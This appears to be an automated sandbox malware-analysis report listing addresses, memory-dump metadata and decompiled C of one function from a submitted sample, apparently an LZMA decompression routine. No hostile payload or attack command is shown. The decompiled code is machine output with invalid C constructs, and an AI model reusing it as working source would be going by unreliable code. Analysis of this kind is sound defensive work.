                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x00000000
                      0x0040667d
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf

                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                      • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                      • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                      • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00405E9D, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E00405E9D(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                      0x00405ead
                      0x00405eb4
                      0x00405eba
                      0x00405ec0
                      0x00000000
                      0x00405ec4
                      0x00405ed0
                      0x00405ed0
                      0x00405ed0
                      0x00405ed9
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x00000000
                      0x00405ee6
                      0x00405eea
                      0x00000000
                      0x00000000
                      0x00405ef3
                      0x00405ef6
                      0x00405ef9
                      0x00405efb
                      0x00405efd
                      0x00000000
                      0x00000000
                      0x00405f03
                      0x00405f06
                      0x00405f08
                      0x00405f09
                      0x00405f0c
                      0x00405f0e
                      0x00405f0f
                      0x00405f11
                      0x00405f14
                      0x00405f19
                      0x00405f1e
                      0x00405f27
                      0x00405f3a
                      0x00405f3d
                      0x00405f46
                      0x00405f49
                      0x00405f71
                      0x00405f71
                      0x00405f73
                      0x00405f81
                      0x00405f81
                      0x00405f85
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405f75
                      0x00405f75
                      0x00405f78
                      0x00405f78
                      0x00405f79
                      0x00405f79
                      0x00000000
                      0x00405f75
                      0x00405f4b
                      0x00405f4f
                      0x00405f54
                      0x00405f54
                      0x00405f5d
                      0x00405f63
                      0x00405f65
                      0x00405f68
                      0x00000000
                      0x00405f6e
                      0x00405f6e
                      0x00000000
                      0x00405f6e
                      0x00000000
                      0x00405f8b
                      0x00405f8b
                      0x00405f8f
                      0x0040683b
                      0x00000000
                      0x0040683b
                      0x00405f98
                      0x00405fa8
                      0x00405fab
                      0x00405fae
                      0x00405fae
                      0x00405fae
                      0x00405fb1
                      0x00405fb1
                      0x00405fb5
                      0x00000000
                      0x00000000
                      0x00405fb7
                      0x00405fba
                      0x00405fbd
                      0x00405fe7
                      0x00405fed
                      0x00405ff4
                      0x00000000
                      0x00405ff4
                      0x00405fbf
                      0x00405fc3
                      0x00405fc6
                      0x00405fcb
                      0x00405fcb
                      0x00405fd6
                      0x00405fdc
                      0x00405fde
                      0x00405fe1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406026
                      0x0040602c
                      0x0040602f
                      0x0040603c
                      0x00406044
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406022
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066ca
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406700
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406709
                      0x00406709
                      0x0040670d
                      0x004068bc
                      0x00000000
                      0x004068bc
                      0x00406719
                      0x00406720
                      0x00406728
                      0x00406728
                      0x00406728
                      0x0040672b
                      0x0040672e
                      0x0040672e
                      0x00000000
                      0x00000000
                      0x0040604c
